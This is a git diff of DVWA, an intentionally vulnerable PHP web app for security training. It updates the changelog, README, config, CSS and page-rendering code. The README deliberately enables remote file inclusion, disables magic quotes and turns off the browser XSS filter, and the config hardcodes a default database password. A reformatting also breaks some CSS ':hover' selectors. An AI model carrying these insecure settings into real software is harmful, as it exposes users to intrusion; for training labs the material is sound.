diff --git a/CHANGELOG.md b/CHANGELOG.md index 01edfaf96..4c036c5fe 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,30 +4,36 @@ DAMN VULNERABLE WEB APPLICATION v1.9 (*Not Yet Released*) ====== -+ Added CSRF token to pre-auth forms (login/setup/security pages). (g0tmi1k + Shinkurt) -+ Added HTTPOnly cookie flag on impossible levels. (g0tmi1k) -+ Added PDO for the impossible examples in SQLi & SQLi Blind. (g0tmi1k) -+ Added system check to setup. (g0tmi1k) -+ Changed brute force medium to be harder due to sleep. (g0tmi1k) -+ Changed file include landing page + added 3x example pages. (g0tmi1k) -+ Changed file include medium to be harder due to more filters. (g0tmi1k) -+ Changed HTTP REFERER check for medium level CSRF. (g0tmi1k) -+ Changed input box for medium level with SQLi + SQLi Blind. (g0tmi1k) -+ Changed SQLi + SQLi Blind to be $_POST rather than $_GET. (g0tmi1k) -+ Changed SQLi Blind to be a real example of the vulnerability. (g0tmi1k) -+ Fixed brute force and file upload impossible levels, as they were vulnerable. (g0tmi1k + Shinkurt) -+ Fixed bug with file fnclude page not loading. (g0tmi1k) -+ Fixed CAPTCHA bug to read URL parameters on impossible. (g0tmi1k) -+ Fixed CAPTCHA bug where the form wouldn't be visible. (g0tmi1k) -+ Fixed CAPTCHA bug where the URL parameters were not being used for low + medium. (g0tmi1k) -+ Fixed CSRF medium level bug when not on localhost. (g0tmi1k) -+ Fixed setup bug with custom URL path. (g0tmi1k) -+ Removed PostgreSQL DB support. (g0tmi1k) -+ Renamed 'Command Execution' to 'Command Injection'. (g0tmi1k) -+ Renamed 'high' level to 'impossible' and created new vectors for 'high'. (g0tmi1k) -+ Updated README and documentation. (g0tmi1k) -+ Various code cleanups in the core PHP files+CSS & Verbosed the documentation. (g0tmi1k) -+ Various setup improvements (e.g. redirection + limited menu links). (g0tmi1k) ++ Added a dedicated objective (or "flag") for file include. (@g0tmi1k) ++ Added a warning to any module that requires a certain configuration. (@g0tmi1k) ++ Added comments to all source code that would be visible via DVWA modules. (@g0tmi1k) ++ Added CSRF token to pre-auth forms (login/setup/security pages). (@g0tmi1k + @Shinkurt) ++ Added HttpOnly cookie flag on impossible levels. (@g0tmi1k) ++ Added more detail to the documentation. (@g0tmi1k) ++ Added PDO to all impossible levels requiring MySQL. (@g0tmi1k) ++ Added PHPIDS options into the config file. (@g0tmi1k) ++ Added system check to setup. (@g0tmi1k) ++ Added various information to all help pages for every module. (@g0tmi1k) ++ Changed brute force medium to be harder due to sleep. (@g0tmi1k) ++ Changed file include landing page + added 3x example pages. (@g0tmi1k) ++ Changed file include medium to be harder due to more filters. (@g0tmi1k) ++ Changed HTTP REFERER check for medium level CSRF. (@g0tmi1k) ++ Changed input box for medium level with SQLi + SQLi Blind. (@g0tmi1k) ++ Changed SQLi + SQLi Blind to be $_POST rather than $_GET. (@g0tmi1k) ++ Changed SQLi Blind to be a real example of the vulnerability. (@g0tmi1k) ++ Fixed brute force and file upload impossible levels, as they were vulnerable. (@g0tmi1k + @Shinkurt) ++ Fixed bug with file fnclude page not loading. (@g0tmi1k) ++ Fixed CAPTCHA bug to read URL parameters on impossible. (@g0tmi1k) ++ Fixed CAPTCHA bug where the form wouldn't be visible. (@g0tmi1k) ++ Fixed CAPTCHA bug where the URL parameters were not being used for low + medium. (@g0tmi1k) ++ Fixed CSRF medium level bug when not on localhost. (@g0tmi1k) ++ Fixed setup bug with custom URL path. (@g0tmi1k) ++ Removed PostgreSQL DB support. (@g0tmi1k) ++ Renamed 'Command Execution' to 'Command Injection'. (@g0tmi1k) ++ Renamed 'high' level to 'impossible' and created new vectors for 'high'. (@g0tmi1k) ++ Updated README and documentation. (@g0tmi1k) ++ Various code cleanups in the core PHP files+CSS. (@g0tmi1k) ++ Various setup improvements (e.g. redirection + limited menu links). (@g0tmi1k) v1.8 (2013-05-01) ====== @@ -40,42 +46,42 @@ v1.8 (2013-05-01) v1.0.7 (2010-09-08) ====== -+ Re-designed the login page + made some other slight cosmetic changes. 06/06/2010 (ethicalhack3r) -+ Started PostgreSQL implementation. 15/03/2010 (ethicalhack3r) -+ A few small cosmetic changes. 15/03/2010 (ethicalhack3r) -+ Improved the help information and look. 15/03/2010 (ethicalhack3r) -+ Fixed a few bugs thanks to Digininja. 15/03/2010 (ethicalhack3r) ++ Re-designed the login page + made some other slight cosmetic changes. 06/06/2010 (@ethicalhack3r) ++ Started PostgreSQL implementation. 15/03/2010 (@ethicalhack3r) ++ A few small cosmetic changes. 15/03/2010 (@ethicalhack3r) ++ Improved the help information and look. 15/03/2010 (@ethicalhack3r) ++ Fixed a few bugs thanks to @Digininja. 15/03/2010 (@ethicalhack3r) + Show logged in username. 05/02/2010 (Jason Jones) -+ Added new info on RandomStorm. 04/02/2010 (ethicalhack3r) -+ Added 'SQL Injection (Blind)'. 04/02/2010 (ethicalhack3r) -+ Added official documentation. 21/11/2009 (ethicalhack3r) -+ Implemented view all source functionality. 16/10/2009 (tmacuk, craig, ethicalhack3r) ++ Added new info on RandomStorm. 04/02/2010 (@ethicalhack3r) ++ Added 'SQL Injection (Blind)'. 04/02/2010 (@ethicalhack3r) ++ Added official documentation. 21/11/2009 (@ethicalhack3r) ++ Implemented view all source functionality. 16/10/2009 (tmacuk, craig, @ethicalhack3r) v1.0.6 (2009-10-05) ====== -+ Fixed a bug where the logo would not show on first time use. 03/09/2009 (ethicalhack3r) -+ Removed 'current password' input box for low+med CSRF security. 03/09/2009 (ethicalhack3r) -+ Added an article which was written for OWASP Turkey. 03/10/2009 (ethicalhack3r) -+ Added more toubleshooting information. 02/10/2009 (ethicalhack3r) -+ Stored XSS high now sanitises output. 02/10/2009 (ethicalhack3r) -+ Fixed a 'bug' in XSS stored low which made it not vulnerable. 02/10/2009 (ethicalhack3r) -+ Rewritten command execution high to use a whitelist. 30/09/09 (ethicalhack3r) -+ Fixed a command execution vulnerability in exec high. 17/09/09 (ethicalhack3r) -+ Added some troubleshooting info for PHP 5.2.6 in readme.txt. 17/09/09 (ethicalhack3r) -+ Added the upload directory to the upload help. 17/09/09 (ethicalhack3r) ++ Fixed a bug where the logo would not show on first time use. 03/09/2009 (@ethicalhack3r) ++ Removed 'current password' input box for low+med CSRF security. 03/09/2009 (@ethicalhack3r) ++ Added an article which was written for OWASP Turkey. 03/10/2009 (@ethicalhack3r) ++ Added more toubleshooting information. 02/10/2009 (@ethicalhack3r) ++ Stored XSS high now sanitises output. 02/10/2009 (@ethicalhack3r) ++ Fixed a 'bug' in XSS stored low which made it not vulnerable. 02/10/2009 (@ethicalhack3r) ++ Rewritten command execution high to use a whitelist. 30/09/09 (@ethicalhack3r) ++ Fixed a command execution vulnerability in exec high. 17/09/09 (@ethicalhack3r) ++ Added some troubleshooting info for PHP 5.2.6 in readme.txt. 17/09/09 (@ethicalhack3r) ++ Added the upload directory to the upload help. 17/09/09 (@ethicalhack3r) v1.0.5 (2009-09-03) ====== -+ Made IE friendly as much as possible. 30/08/2009 (ethicalhack3r) -+ Removed the acunetix scan report. 30/08/2009 (ethicalhack3r) -+ Added 'Clear Log' button to PHPIDS parser. 27/08/2009 (ethicalhack3r) -+ Implemented PHPIDS log parser. 27/08/2009 (ethicalhack3r) -+ Implemented Stored XSS vulnerability. 27/08/2009 (ethicalhack3r) -+ Added htaccess rule for localhost access only. 22/08/2009 (ethicalhack3r) -+ Added CSRF. 01/08/2009 (ethicalhack3r) -+ Implemented sessions/login. 01/08/2009 (ethicalhack3r) ++ Made IE friendly as much as possible. 30/08/2009 (@ethicalhack3r) ++ Removed the acunetix scan report. 30/08/2009 (@ethicalhack3r) ++ Added 'Clear Log' button to PHPIDS parser. 27/08/2009 (@ethicalhack3r) ++ Implemented PHPIDS log parser. 27/08/2009 (@ethicalhack3r) ++ Implemented Stored XSS vulnerability. 27/08/2009 (@ethicalhack3r) ++ Added htaccess rule for localhost access only. 22/08/2009 (@ethicalhack3r) ++ Added CSRF. 01/08/2009 (@ethicalhack3r) ++ Implemented sessions/login. 01/08/2009 (@ethicalhack3r) + Complete recode. (jamesr) + Complete redesign. (jamesr) + Delimited 'dvwa' in session- minimising the risk of clash with other projects running on localhost. 01/08/2009 (jamesr) diff --git a/README.md b/README.md index 8da0c1339..9fd47751d 100644 --- a/README.md +++ b/README.md @@ -42,9 +42,9 @@ along with Damn Vulnerable Web Application (DVWA). If not, see http://www.gnu.o DVWA is available either as a package that will run on your own web server or as a Live CD: - + DVWA v1.9 (Testing) - (1.3 MB) [Download ZIP](https://github.com/RandomStorm/DVWA/archive/master.zip) - `git clone https://github.com/RandomStorm/DVWA` - + DVWA v1.8 (Stable) - (1.3 MB) [Download ZIP](https://github.com/RandomStorm/DVWA/archive/v1.0.8.zip) - + DVWA v1.0.7 LiveCD - (480 MB) [Download ISO](http://www.dvwa.co.uk/DVWA-1.0.7.iso) + + DVWA v1.9 Source (Testing) - \[1.3 MB\] [Download ZIP](https://github.com/RandomStorm/DVWA/archive/master.zip) // `git clone https://github.com/RandomStorm/DVWA` + + DVWA v1.8 Source (Stable) - \[1.3 MB\] [Download ZIP](https://github.com/RandomStorm/DVWA/archive/v1.0.8.zip) - Released 2013-05-01 + + DVWA v1.0.7 LiveCD - \[480 MB\] [Download ISO](http://www.dvwa.co.uk/DVWA-1.0.7.iso) - Released 2010-09-08 - - - @@ -90,12 +90,12 @@ $_DVWA[ 'db_database' ] = 'dvwa'; Depening on your Operating System as well as version of PHP, you may wish to alter the default configuration. The location of the files will be different on a per-machine basis. Note, You are unable to use PHP v7.0 or later with DVWA. -**Folders Permissions**: +**Folder Permissions**: * `./hackable/uploads/` - Needs to be writable by the web service (for File Upload). -* `./external/phpids/0.6/lib/IDS/tmp/` - Needs to be writable by the web service (if you wish to use PHPIDS). +* `./external/phpids/0.6/lib/IDS/tmp/phpids_log.txt` - Needs to be writable by the web service (if you wish to use PHPIDS). -**PHP**: +**PHP configuration**: * `allow_url_include = on` - Allows for Remote File Inclusions (RFI) [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] * `allow_url_fopen = on` - Allows for Remote File Inclusions (RFI) [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] @@ -103,9 +103,9 @@ Note, You are unable to use PHP v7.0 or later with DVWA. * `magic_quotes_gpc = off` - (If PHP <= v5.4) Allows for SQL Injection (SQLi) [[magic_quotes_gpc](https://secure.php.net/manual/en/security.magicquotes.php)] * `display_errors = off` - (Optional) Hides PHP warning messages to make it less verbose [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] -**`config/config.inc.php`**: +**File: `config/config.inc.php`**: -* `$_DVWA[ 'recaptcha_public_key' ]` & `$_DVWA[ 'recaptcha_private_key' ]` - Need to be generated from: https://www.google.com/recaptcha/admin/create +* `$_DVWA[ 'recaptcha_public_key' ]` & `$_DVWA[ 'recaptcha_private_key' ]` - These values need to be generated from: https://www.google.com/recaptcha/admin/create ### Default Credentials @@ -122,9 +122,9 @@ Login URL: http://127.0.0.1/dvwa/login.php For the latest troubleshooting information please visit: https://github.com/RandomStorm/DVWA/issues -+Q. SQL Injection wont work on PHP version 5.2.6. ++Q. SQL Injection wont work on PHP v5.2.6. --A.If you are using PHP version 5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work. +-A.If you are using PHP v5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work. In `.htaccess`: @@ -154,7 +154,7 @@ With: +Q. My XSS payload won't run in IE. --A. If your running IE8 or above IE actively filters any XSS. To disable the filter you can do so by setting the HTTP header `X-XSS-Protection: 0` or disable it from internet options. There may also be ways to bypass the filter. +-A. If your running IE8 or above, IE actively filters any XSS. To disable the filter you can do so by setting the HTTP header `X-XSS-Protection: 0` or disable it from internet options. There may also be ways to bypass the filter. - - - diff --git a/about.php b/about.php index a80089b13..3e147e720 100644 --- a/about.php +++ b/about.php @@ -1,46 +1,46 @@

About

-

Version ".dvwaVersionGet()." (Release date: ".dvwaReleaseDateGet().")

+

Version " . dvwaVersionGet() . " (Release date: " . dvwaReleaseDateGet() . ")

Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment

The official documentation for DVWA can be found here.

DVWA is a RandomStorm OpenSource project. All material is copyright 2008-2015 RandomStorm & Ryan Dewhurst.

Links

Credits

License

@@ -48,12 +48,11 @@ it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

-

The PHPIDS library is included, in good faith, with this DVWA distribution. The operation of PHPIDS is provided without support from the DVWA team. It is licensed under separate terms to the DVWA code.

+

The PHPIDS library is included, in good faith, with this DVWA distribution. The operation of PHPIDS is provided without support from the DVWA team. It is licensed under separate terms to the DVWA code.

Development

Everyone is welcome to contribute and help make DVWA as successful as it can be. All contributors can have their name and link (if they wish) placed in the credits section. To contribute pick an Issue from the Project Home to work on or submit a patch to the Issues list.

- -"; +\n"; dvwaHtmlEcho( $page ); exit; diff --git a/config/config.inc.php b/config/config.inc.php index 763a006bb..37c190cda 100644 --- a/config/config.inc.php +++ b/config/config.inc.php @@ -17,17 +17,28 @@ $_DVWA[ 'db_user' ] = 'root'; $_DVWA[ 'db_password' ] = 'p@ssw0rd'; -# Only used for PostgreSQL/PGSQL +# Only used with PostgreSQL/PGSQL database selection. $_DVWA[ 'db_port '] = '5432'; # ReCAPTCHA settings -# Get your keys at https://www.google.com/recaptcha/admin/create +# Used for the 'Insecure CAPTCHA' module +# You'll need to generate your own keys at: https://www.google.com/recaptcha/admin/create $_DVWA[ 'recaptcha_public_key' ] = ''; $_DVWA[ 'recaptcha_private_key' ] = ''; # Default security level -# The default is impossible, you may wish to set this to either low, medium or high. -# If you specify an invalid level, DVWA will default to impossible. +# Default value for the secuirty level with each session. +# The default is 'impossible'. You may wish to set this to either 'low', 'medium', 'high' or impossible'. $_DVWA[ 'default_security_level' ] = 'impossible'; +# Default PHPIDS status +# PHPIDS status with each session. +# The default is 'disabled'. You can set this to be either 'enabled' or 'disabled'. +$_DVWA[ 'default_phpids_level' ] = 'disabled'; + +# Verbose PHPIDS messages +# Enabling this will show why the WAF blocked the request on the blocked request. +# The default is 'disabled'. You can set this to be either 'true' or 'false'. +$_DVWA[ 'default_phpids_verbose' ] = 'false'; + ?> diff --git a/dvwa/css/help.css b/dvwa/css/help.css index 286618066..abe9ebf5e 100644 --- a/dvwa/css/help.css +++ b/dvwa/css/help.css @@ -8,11 +8,9 @@ h1 { font-size: 25px; } - div#container { } - div#code { background-color: #ffffff; } @@ -20,3 +18,8 @@ div#code { div#area { margin-left: 30px; } + +span.spoiler { + background-color: black; + color: black; +} diff --git a/dvwa/css/login.css b/dvwa/css/login.css index e8d89ab2f..e4727a02e 100644 --- a/dvwa/css/login.css +++ b/dvwa/css/login.css @@ -1,8 +1,27 @@ body { background: #fefffe; font: 12px/15px Arial, Helvetica, sans-serif; - line-height:20px; - color:#6b6b6b; + line-height: 20px; + color: #6b6b6b; +} + +#wrapper { + text-align: center; + margin: 0 auto; +} + +#content { + display: inline-block; + padding: 20px; + width: auto; +} + +#footer { + position: absolute; + width: 100%; + height: 50px; + bottom: 0px; + left: 0px; } label { @@ -15,7 +34,7 @@ label { font-weight: bold; } -.loginInput{ +.loginInput { float: left; color: #6B6B6B; width: 320px; @@ -31,9 +50,10 @@ fieldset { width: 350px; padding: 10px 20px 10px 20px; overflow: hidden; - border-style:none; + border-style: none; } p { font-size: 10px; } + diff --git a/dvwa/css/main.css b/dvwa/css/main.css index e713947c3..82e6658a4 100644 --- a/dvwa/css/main.css +++ b/dvwa/css/main.css @@ -1,13 +1,13 @@ -body{ - margin:0; +body { + margin: 0; color: #2f2f2f; font: 12px/15px Arial, Helvetica, sans-serif; - min-width:981px; + min-width: 981px; height: 100%; - position:relative; + position: relative; } -body.home{ +body.home { background: #e7e7e7; } @@ -25,7 +25,7 @@ a img { border: 0; } -a:hover { +a: hover { text-decoration: none; } @@ -34,29 +34,25 @@ input, textarea, select { vertical-align: middle; } -form,fieldset{ +form,fieldset { margin: 0; padding: 0; border-style: none; } - em { font-weight: bold; font-style: normal; } - h1, h2, h3, h4, h5, h6 { margin-top: 0px; } - h1 { font-size: 200%; } - h2 { font-size: 160%; } @@ -66,7 +62,6 @@ h3 { font-size: 130%; } - hr { border-width: 0px; color: #C3D9FF; @@ -74,7 +69,6 @@ hr { height: 1px; } - ul.menuBlocks { list-style-type: none; padding-left: 0px; @@ -83,18 +77,15 @@ ul.menuBlocks { margin-left: 0px; } - ul + ul, ul + ul.menuBlocks, ul + h1, ul + h2, ul + p { margin-top: 20px; } - .fixed { font-family: Fixed, Courier, monospace; font-size: 13px; } - div.warning { border: 2px solid #ff0000; padding: 10px 20px 10px 20px; @@ -120,13 +111,13 @@ div#container { height: 100%; margin-left: auto; margin-right: auto; - background:#f4f4f4; + background: #f4f4f4; font-size: 13px; } div#header { padding: 10px; - overflow:hidden; + overflow: hidden; background: #2f2f2f; border-bottom: 5px solid #A1CC33; text-align: center; @@ -137,9 +128,8 @@ div#system_info { text-align: right; } - div#main_body { - float:right; + float: right; width: 693px; background: #f4f4f4; padding-top: 20px; @@ -147,13 +137,11 @@ div#main_body { font-size: 13px; } - div.body_padded { padding-left: 20px; padding-right: 20px; } - div#main_menu { float: left; width: 200px; @@ -163,7 +151,6 @@ div#main_menu { padding-bottom: 10px; } - div#main_menu li { border-width: 1px; border-style: solid; @@ -173,40 +160,33 @@ div#main_menu li { background-color: #bebebe; } - div#main_menu li a { color: #000000; text-decoration: none; text-decoration: none; } - div#main_menu li.selected { border-color: #758DAE #758DAE #758DAE #758DAE; background-color: #99cc33; } - div#main_menu li.selected a { color: #F9F7ED; } - -div#main_menu li:hover { +div#main_menu li: hover { border-color: #D2D4D4; } - -div#main_menu li:hover a { +div#main_menu li: hover a { color: #F9F7ED; } - div#main_menu_padded { padding: 15px; } - div#footer { color: #999999; background: #2f2f2f; @@ -215,7 +195,6 @@ div#footer { border-top: 5px solid #A1CC33; } - input.popup_button { border-width: 1px; border-style: solid; @@ -226,7 +205,6 @@ input.popup_button { float: right; } - div.vulnerable_code_area { background-color: #f8fafa; border-width: 1px; @@ -253,12 +231,10 @@ div#idslog { background-color: #f8fafa; } - pre { color: red; } - div.submenu { border-bottom: 1px solid #000000; margin-bottom: 15px; @@ -266,18 +242,25 @@ div.submenu { font-size: 13px; } - span.submenu_item { padding: 0px 10px 0px 10px; } - span.submenu_item + span.submenu_item { border-left: 1px dashed #000000; font-size: 13px; } - span.selected { font-weight: bold; } + +span.success { + + color:green; +} + +span.failure { + color:red; + font-weight: bold; +} diff --git a/dvwa/css/source.css b/dvwa/css/source.css index 286618066..7d996c2f5 100644 --- a/dvwa/css/source.css +++ b/dvwa/css/source.css @@ -8,11 +8,9 @@ h1 { font-size: 25px; } - div#container { } - div#code { background-color: #ffffff; } diff --git a/dvwa/includes/dvwaPage.inc.php b/dvwa/includes/dvwaPage.inc.php index 021fe3f31..88ff699b0 100644 --- a/dvwa/includes/dvwaPage.inc.php +++ b/dvwa/includes/dvwaPage.inc.php @@ -8,24 +8,29 @@ session_start(); // Creates a 'Full Path Disclosure' vuln. // Include configs -require_once DVWA_WEB_PAGE_TO_ROOT.'config/config.inc.php'; +require_once DVWA_WEB_PAGE_TO_ROOT . 'config/config.inc.php'; require_once( 'dvwaPhpIds.inc.php' ); // Declare the $html variable -if(!isset( $html )) { +if( !isset( $html ) ) { $html = ""; } // Valid security levels $security_levels = array('low', 'medium', 'high', 'impossible'); -if(!isset( $_COOKIE[ 'security' ] ) || !in_array( $_COOKIE[ 'security' ], $security_levels ) ) { - // Set security cookie to impossible if no cookie exists - if( in_array( $_DVWA[ 'default_security_level' ], $security_levels) ) { +if( !isset( $_COOKIE[ 'security' ] ) || !in_array( $_COOKIE[ 'security' ], $security_levels ) ) { + // Set security cookie to impossible if no cookie exists + if( in_array( $_DVWA[ 'default_security_level' ], $security_levels) ) { dvwaSecurityLevelSet( $_DVWA[ 'default_security_level' ] ); - } - else { + } + else { dvwaSecurityLevelSet( 'impossible' ); } + + if( $_DVWA[ 'default_phpids_level' ] == 'enabled' ) + dvwaPhpIdsEnabledSet( true ); + else + dvwaPhpIdsEnabledSet( false ); } // DVWA version @@ -52,7 +57,7 @@ function &dvwaSessionGrab() { function dvwaPageStartup( $pActions ) { if( in_array( 'authenticated', $pActions ) ) { if( !dvwaIsLoggedIn()) { - dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT.'login.php' ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'login.php' ); } } @@ -112,12 +117,12 @@ function dvwaCurrentUser() { function &dvwaPageNewGrab() { $returnArray = array( - 'title' => 'Damn Vulnerable Web Application (DVWA) v'.dvwaVersionGet().'', + 'title' => 'Damn Vulnerable Web Application (DVWA) v' . dvwaVersionGet() . '', 'title_separator' => ' :: ', - 'body' => '', - 'page_id' => '', - 'help_button' => '', - 'source_button' => '', + 'body' => '', + 'page_id' => '', + 'help_button' => '', + 'source_button' => '', ); return $returnArray; } @@ -162,7 +167,7 @@ function dvwaMessagePop() { function messagesPopAllToHtml() { $messagesHtml = ''; - while( $message = dvwaMessagePop() ) { // TODO- sharpen! + while( $message = dvwaMessagePop() ) { // TODO- sharpen! $messagesHtml .= "
{$message}
"; } @@ -187,16 +192,16 @@ function dvwaHtmlEcho( $pPage ) { if( dvwaIsLoggedIn() ) { $menuBlocks[ 'vulnerabilities' ] = array(); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'brute', 'name' => 'Brute Force', 'url' => 'vulnerabilities/brute/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'exec', 'name' => 'Command Injection', 'url' => 'vulnerabilities/exec/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'csrf', 'name' => 'CSRF', 'url' => 'vulnerabilities/csrf/.' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'brute', 'name' => 'Brute Force', 'url' => 'vulnerabilities/brute/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'exec', 'name' => 'Command Injection', 'url' => 'vulnerabilities/exec/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'csrf', 'name' => 'CSRF', 'url' => 'vulnerabilities/csrf/' ); $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'fi', 'name' => 'File Inclusion', 'url' => 'vulnerabilities/fi/.?page=include.php' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'upload', 'name' => 'File Upload', 'url' => 'vulnerabilities/upload/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'captcha', 'name' => 'Insecure CAPTCHA', 'url' => 'vulnerabilities/captcha/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli', 'name' => 'SQL Injection', 'url' => 'vulnerabilities/sqli/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli_blind', 'name' => 'SQL Injection (Blind)', 'url' => 'vulnerabilities/sqli_blind/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_r', 'name' => 'XSS (Reflected)', 'url' => 'vulnerabilities/xss_r/.' ); - $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_s', 'name' => 'XSS (Stored)', 'url' => 'vulnerabilities/xss_s/.' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'upload', 'name' => 'File Upload', 'url' => 'vulnerabilities/upload/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'captcha', 'name' => 'Insecure CAPTCHA', 'url' => 'vulnerabilities/captcha/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli', 'name' => 'SQL Injection', 'url' => 'vulnerabilities/sqli/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'sqli_blind', 'name' => 'SQL Injection (Blind)', 'url' => 'vulnerabilities/sqli_blind/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_r', 'name' => 'XSS (Reflected)', 'url' => 'vulnerabilities/xss_r/' ); + $menuBlocks[ 'vulnerabilities' ][] = array( 'id' => 'xss_s', 'name' => 'XSS (Stored)', 'url' => 'vulnerabilities/xss_s/' ); } $menuBlocks[ 'meta' ] = array(); @@ -223,7 +228,7 @@ function dvwaHtmlEcho( $pPage ) { $menuHtml .= ""; } - // Get security cookie -- + // Get security cookie -- $securityLevelHtml = ''; switch( dvwaSecurityLevelGet() ) { case 'low': @@ -239,10 +244,10 @@ function dvwaHtmlEcho( $pPage ) { $securityLevelHtml = 'impossible'; break; } - // -- END (security cookie) + // -- END (security cookie) - $phpIdsHtml = 'PHPIDS: '.( dvwaPhpIdsIsEnabled() ? 'enabled' : 'disabled' ); - $userInfoHtml = 'Username: '.( dvwaCurrentUser() ); + $phpIdsHtml = 'PHPIDS: ' . ( dvwaPhpIdsIsEnabled() ? 'enabled' : 'disabled' ); + $userInfoHtml = 'Username: ' . ( dvwaCurrentUser() ); $messagesHtml = messagesPopAllToHtml(); if( $messagesHtml ) { @@ -253,16 +258,16 @@ function dvwaHtmlEcho( $pPage ) { if( dvwaIsLoggedIn() ) $systemInfoHtml = "
{$userInfoHtml}
Security Level: {$securityLevelHtml}
{$phpIdsHtml}
"; if( $pPage[ 'source_button' ] ) { - $systemInfoHtml = dvwaButtonSourceHtmlGet( $pPage[ 'source_button' ] )." $systemInfoHtml"; + $systemInfoHtml = dvwaButtonSourceHtmlGet( $pPage[ 'source_button' ] ) . " $systemInfoHtml"; } if( $pPage[ 'help_button' ] ) { - $systemInfoHtml = dvwaButtonHelpHtmlGet( $pPage[ 'help_button' ] )." $systemInfoHtml"; + $systemInfoHtml = dvwaButtonHelpHtmlGet( $pPage[ 'help_button' ] ) . " $systemInfoHtml"; } - // Send Headers + main HTML code - Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 - Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... - Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + // Send Headers + main HTML code + Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 + Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... + Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past echo " @@ -274,11 +279,11 @@ function dvwaHtmlEcho( $pPage ) { {$pPage[ 'title' ]} - + - + - + @@ -287,7 +292,7 @@ function dvwaHtmlEcho( $pPage ) {
- \"Damn + \"Damn
@@ -316,7 +321,7 @@ function dvwaHtmlEcho( $pPage ) {
-

Damn Vulnerable Web Application (DVWA) v".dvwaVersionGet()."

+

Damn Vulnerable Web Application (DVWA) v" . dvwaVersionGet() . "

@@ -329,10 +334,10 @@ function dvwaHtmlEcho( $pPage ) { function dvwaHelpHtmlEcho( $pPage ) { - // Send Headers - Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 - Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... - Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + // Send Headers + Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 + Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... + Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past echo " @@ -345,9 +350,9 @@ function dvwaHelpHtmlEcho( $pPage ) { {$pPage[ 'title' ]} - + - + @@ -366,10 +371,10 @@ function dvwaHelpHtmlEcho( $pPage ) { function dvwaSourceHtmlEcho( $pPage ) { - // Send Headers - Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 - Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... - Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + // Send Headers + Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 + Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... + Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past echo " @@ -382,9 +387,9 @@ function dvwaSourceHtmlEcho( $pPage ) { {$pPage[ 'title' ]} - + - + @@ -404,23 +409,23 @@ function dvwaSourceHtmlEcho( $pPage ) { // To be used on all external links -- function dvwaExternalLinkUrlGet( $pLink,$text=null ) { if(is_null( $text )) { - return ''.$pLink.''; + return '' . $pLink . ''; } else { - return ''.$text.''; + return '' . $text . ''; } } // -- END ( external links) function dvwaButtonHelpHtmlGet( $pId ) { $security = dvwaSecurityLevelGet(); - return ""; + return ""; } function dvwaButtonSourceHtmlGet( $pId ) { $security = dvwaSecurityLevelGet(); - return ""; + return ""; } @@ -441,9 +446,9 @@ function dvwaButtonSourceHtmlGet( $pId ) { //$DBMS_connError = ' //
-// -// 
Unable to connect to the database.
'.$DBMS_errorFunc.'

-// Click here to setup the database. +// +// 
Unable to connect to the database.
' . $DBMS_errorFunc . '

+// Click here to setup the database. //
'; function dvwaDatabaseConnect() { @@ -457,22 +462,22 @@ function dvwaDatabaseConnect() { || !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) { //die( $DBMS_connError ); dvwaLogout(); - dvwaMessagePush( 'Unable to connect to the database.
'.$DBMS_errorFunc ); - dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT.'setup.php' ); + dvwaMessagePush( 'Unable to connect to the database.
